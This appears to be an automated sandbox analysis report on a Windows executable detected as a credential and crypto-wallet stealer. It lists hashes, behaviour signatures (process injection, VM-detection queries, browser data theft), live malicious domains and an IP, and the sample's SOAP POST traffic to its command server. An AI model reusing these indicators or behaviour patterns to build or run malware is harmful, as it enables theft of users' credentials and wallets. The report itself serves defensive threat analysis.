Play interactive tour

Edit tour

Analysis Report YZ1q5HY7kK.exe

Overview

General Information

Sample Name:	YZ1q5HY7kK.exe
Analysis ID:	383823
MD5:	77dfc735d37c3f44ab13d253ccd5417c
SHA1:	fa4d120c3f31281722c11c65aecf200634e7299b
SHA256:	802c523228e29013b5b60c643272ba0c837a7de3902c55424d7779535309a235
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Allocates memory in foreign processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Performs DNS queries to domains with low reputation

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Is looking for software installed on the system

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Startup

System is w10x64

YZ1q5HY7kK.exe (PID: 6884 cmdline: 'C:\Users\user\Desktop\YZ1q5HY7kK.exe' MD5: 77DFC735D37C3F44AB13D253CCD5417C)

AddInProcess32.exe (PID: 7088 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.651607493.0000000002FDB000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x6ff8:$: VFZxUUFBT
00000000.00000002.653277688.0000000004009000.00000004.00000001.sdmp	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x1e69b8:$: VFZxUUFBT
Process Memory Space: AddInProcess32.exe PID: 7088	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: YZ1q5HY7kK.exe PID: 6884	SUSP_Double_Base64_Encoded_Executable	Detects an executable that has been encoded with base64 twice	Florian Roth	0x3ceb4:$: VFZxUUFBT 0x356d94:$: VFZxUUFBT

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: https://ry.beablog.ru	Avira URL Cloud: Label: PUA
Source: http://ynnnzonie.xyz/	Avira URL Cloud: Label: malware
Source: http://ynnnzonie.xyz	Avira URL Cloud: Label: malware
Source: https://ry.beablog.ru/SystemComponentModelDesignerCategoryAttributeE	Avira URL Cloud: Label: PUA
Source: http://ynnnzonie.xyz:80/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Show sources

Source: YZ1q5HY7kK.exe	Virustotal: Detection: 47%	Perma Link
Source: YZ1q5HY7kK.exe	Metadefender: Detection: 32%	Perma Link
Source: YZ1q5HY7kK.exe	ReversingLabs: Detection: 68%

Source: YZ1q5HY7kK.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown

HTTPS traffic detected: 81.177.140.169:443 -> 192.168.2.4:49719 version: TLS 1.2

Source: YZ1q5HY7kK.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h

Networking:

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	DNS query: ynnnzonie.xyz
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	DNS query: ynnnzonie.xyz
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	DNS query: ynnnzonie.xyz

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ynnnzonie.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: ynnnzonie.xyzContent-Length: 24598Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: ynnnzonie.xyzContent-Length: 24584Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 81.177.140.169 81.177.140.169

Source: Joe Sandbox View

ASN Name: AS40676US AS40676US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: k9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j

Source: unknown

DNS traffic detected: queries for: ry.beablog.ru

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: ynnnzonie.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: AddInProcess32.exe, 00000004.00000002.705876812.0000000003046000.00000004.00000001.sdmp	String found in binary or memory: http://bot.whatismyipaddress.com/
Source: AddInProcess32.exe, 00000004.00000002.705315360.00000000013DE000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: AddInProcess32.exe, 00000004.00000002.705876812.0000000003046000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.orgdP~
Source: YZ1q5HY7kK.exe, 00000000.00000002.651574218.0000000002FC5000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: AddInProcess32.exe, 00000004.00000002.705315360.00000000013DE000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: AddInProcess32.exe, 00000004.00000002.705315360.00000000013DE000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: AddInProcess32.exe, 00000004.00000002.705315360.00000000013DE000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: http://forms.rea
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: http://go.micros
Source: AddInProcess32.exe, 00000004.00000002.705315360.00000000013DE000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: AddInProcess32.exe, 00000004.00000002.705315360.00000000013DE000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: YZ1q5HY7kK.exe, 00000000.00000002.651574218.0000000002FC5000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0#
Source: YZ1q5HY7kK.exe, 00000000.00000002.651574218.0000000002FC5000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: AddInProcess32.exe, 00000004.00000002.706464446.0000000003251000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org
Source: AddInProcess32.exe, 00000004.00000002.706464446.0000000003251000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: AddInProcess32.exe, 00000004.00000002.706464446.0000000003251000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/BrowserExtension.Objects.Enums
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: AddInProcess32.exe, 00000004.00000002.705876812.0000000003046000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: YZ1q5HY7kK.exe, 00000000.00000002.651423377.0000000002F61000.00000004.00000001.sdmp, AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: http://service.r
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: http://support.a
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/0
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetArguments
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsResponse
Source: AddInProcess32.exe, 00000004.00000002.706509045.000000000327B000.00000004.00000001.sdmp, AddInProcess32.exe, 00000004.00000002.705910872.000000000306A000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: AddInProcess32.exe, 00000004.00000002.706253891.000000000312E000.00000004.00000001.sdmp, AddInProcess32.exe, 00000004.00000002.706486141.0000000003267000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequest
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequestResponse
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: AddInProcess32.exe, 00000004.00000002.706486141.0000000003267000.00000004.00000001.sdmp	String found in binary or memory: http://ynnnzonie.xyz
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://ynnnzonie.xyz/
Source: AddInProcess32.exe, 00000004.00000002.706509045.000000000327B000.00000004.00000001.sdmp	String found in binary or memory: http://ynnnzonie.xyz41k
Source: AddInProcess32.exe, 00000004.00000002.705798521.0000000002FF1000.00000004.00000001.sdmp	String found in binary or memory: http://ynnnzonie.xyz:80/
Source: AddInProcess32.exe, 00000004.00000002.706253891.000000000312E000.00000004.00000001.sdmp	String found in binary or memory: http://ynnnzonie.xyzdrt
Source: AddInProcess32.exe, 00000004.00000002.706989184.00000000034F7000.00000004.00000001.sdmp, tmpA6C2.tmp.4.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AddInProcess32.exe	String found in binary or memory: https://api.ip.sb/geoip
Source: YZ1q5HY7kK.exe, 00000000.00000002.653240729.0000000003FE9000.00000004.00000001.sdmp, AddInProcess32.exe, 00000004.00000002.704724330.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.ip.sb/geoipAppData
Source: AddInProcess32.exe, 00000004.00000002.705876812.0000000003046000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb41k
Source: YZ1q5HY7kK.exe, 00000000.00000002.653240729.0000000003FE9000.00000004.00000001.sdmp, AddInProcess32.exe, 00000004.00000002.704724330.0000000000402000.00000040.00000001.sdmp, AddInProcess32.exe, 00000004.00000002.705876812.0000000003046000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org
Source: AddInProcess32.exe, 00000004.00000002.706989184.00000000034F7000.00000004.00000001.sdmp, tmpA6C2.tmp.4.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AddInProcess32.exe, 00000004.00000002.706989184.00000000034F7000.00000004.00000001.sdmp, tmpA6C2.tmp.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AddInProcess32.exe, 00000004.00000002.706989184.00000000034F7000.00000004.00000001.sdmp, tmpA6C2.tmp.4.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AddInProcess32.exe, 00000004.00000002.706989184.00000000034F7000.00000004.00000001.sdmp, tmpA6C2.tmp.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: https://get.adob
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: https://helpx.ad
Source: AddInProcess32.exe, 00000004.00000002.705876812.0000000003046000.00000004.00000001.sdmp	String found in binary or memory: https://icanhazip.com
Source: YZ1q5HY7kK.exe, 00000000.00000002.653240729.0000000003FE9000.00000004.00000001.sdmp, AddInProcess32.exe, 00000004.00000002.704724330.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
Source: YZ1q5HY7kK.exe, 00000000.00000002.653240729.0000000003FE9000.00000004.00000001.sdmp, AddInProcess32.exe, AddInProcess32.exe, 00000004.00000002.704724330.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: AddInProcess32.exe, 00000004.00000002.705854567.000000000303C000.00000004.00000001.sdmp, AddInProcess32.exe, 00000004.00000002.705971238.0000000003083000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: YZ1q5HY7kK.exe, 00000000.00000002.651423377.0000000002F61000.00000004.00000001.sdmp	String found in binary or memory: https://ry.beablog.ru
Source: YZ1q5HY7kK.exe, 00000000.00000002.651423377.0000000002F61000.00000004.00000001.sdmp	String found in binary or memory: https://ry.beablog.ru/SystemComponentModelDesignerCategoryAttributeE
Source: AddInProcess32.exe, 00000004.00000002.706989184.00000000034F7000.00000004.00000001.sdmp, tmpA6C2.tmp.4.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: AddInProcess32.exe, 00000004.00000002.706989184.00000000034F7000.00000004.00000001.sdmp, tmpA6C2.tmp.4.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: AddInProcess32.exe, 00000004.00000002.706764445.00000000033C6000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: AddInProcess32.exe, 00000004.00000002.705876812.0000000003046000.00000004.00000001.sdmp	String found in binary or memory: https://wtfismyip.com/text
Source: AddInProcess32.exe, 00000004.00000002.705315360.00000000013DE000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: AddInProcess32.exe, 00000004.00000002.706989184.00000000034F7000.00000004.00000001.sdmp, tmpA6C2.tmp.4.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719

Source: unknown

HTTPS traffic detected: 81.177.140.169:443 -> 192.168.2.4:49719 version: TLS 1.2

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_0546FEB8 NtUnmapViewOfSection,
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_0546FEB0 NtUnmapViewOfSection,

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_00B941F3
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_02E7C1F8
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_02E7EB00
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_02E70FC8
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_02E7F288
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_02F07B7F
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_02F091F8
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_02F0B681
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_02F06400
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Code function: 0_2_0546D567
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_02E7D7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_02E7CAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06388340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06380040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_0638FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06381180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06382830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06382840

Source: YZ1q5HY7kK.exe	Binary or memory string: OriginalFilename vs YZ1q5HY7kK.exe
Source: YZ1q5HY7kK.exe, 00000000.00000002.653240729.0000000003FE9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMicate.exe4 vs YZ1q5HY7kK.exe
Source: YZ1q5HY7kK.exe, 00000000.00000002.649694134.0000000000B92000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameDianthus.exe4 vs YZ1q5HY7kK.exe
Source: YZ1q5HY7kK.exe, 00000000.00000002.656615061.0000000005500000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs YZ1q5HY7kK.exe
Source: YZ1q5HY7kK.exe	Binary or memory string: OriginalFilenameDianthus.exe4 vs YZ1q5HY7kK.exe

Source: YZ1q5HY7kK.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000000.00000002.651607493.0000000002FDB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000000.00000002.653277688.0000000004009000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: Process Memory Space: YZ1q5HY7kK.exe PID: 6884, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889

Source: classification engine

Classification label: mal92.troj.spyw.evad.winEXE@3/28@6/2

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YZ1q5HY7kK.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

File created: C:\Users\user\AppData\Local\Temp\tmp777.tmp

Jump to behavior

Source: YZ1q5HY7kK.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\YZ1q5HY7kK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: YZ1q5HY7kK.exe	Virustotal: Detection: 47%
Source: YZ1q5HY7kK.exe	Metadefender: Detection: 32%
